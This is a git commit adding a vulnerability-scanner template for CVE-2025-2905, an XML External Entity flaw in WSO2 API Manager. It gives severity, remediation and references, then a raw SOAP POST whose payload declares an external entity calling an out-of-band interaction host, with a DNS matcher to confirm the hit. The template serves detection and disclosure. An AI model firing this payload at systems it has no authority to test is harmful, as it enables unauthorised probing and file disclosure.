CVE-2025-2905 - WSO2 API Manager - XML External Entity Injection

2026-01-31 15:53:33 +08:00 · 2025-11-26 19:31:41 +05:30
parent d71bb2ecb0
commit 2b1d34b060
1 changed files with 52 additions and 0 deletions
--- a/http/cves/2025/CVE-2025-2905.yaml
+++ b/http/cves/2025/CVE-2025-2905.yaml
@@ -0,0 +1,52 @@
+id: CVE-2025-2905
+
+info:
+  name: WSO2 API Manager - XML External Entity Injection
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    WSO2 API Manager contains an XML External Entity (XXE) vulnerability caused by insufficient validation of XML input in crafted URL paths, letting unauthenticated remote attackers read files or cause denial-of-service, exploit requires sending malicious XML payloads.
+  impact: |
+    Attackers can read server files or cause service disruption through DoS attacks, potentially leading to information disclosure or system unavailability.
+  remediation: |
+    Update to the latest version of WSO2 API Manager with patched XML parser configurations and validation mechanisms.
+  reference:
+    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-3993/
+    - https://crnkovic.dev/wso2-404-to-arbitrary-file-read/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2025-2905
+    cwe-id: CWE-611
+    epss-score: 0.00082
+    epss-percentile: 0.25104
+  tags: cve,cve2025,xxe,wso2,oob,oast
+
+http:
+  - raw:
+      - |
+        POST /services/WorkflowCallbackService HTTP/1.1
+        Host: {{Hostname}}
+        SOAPAction: "urn:resumeEvent"
+        Content-Type: text/xml
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+                  xmlns:ns="http://callback.workflow.apimgt.carbon.wso2.org">
+          <soapenv:Header/>
+          <soapenv:Body>
+            <ns:resumeEvent>
+              <ns:workflowReference></ns:workflowReference>
+              <ns:status>APPROVED</ns:status>
+              <ns:description>
+                <![CDATA[<!DOCTYPE blah SYSTEM "http://{{interactsh-url}}">]]>
+              </ns:description>
+            </ns:resumeEvent>
+          </soapenv:Body>
+        </soapenv:Envelope>
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, 'dns')
+          - contains(content_type, "text/xml")
+        condition: and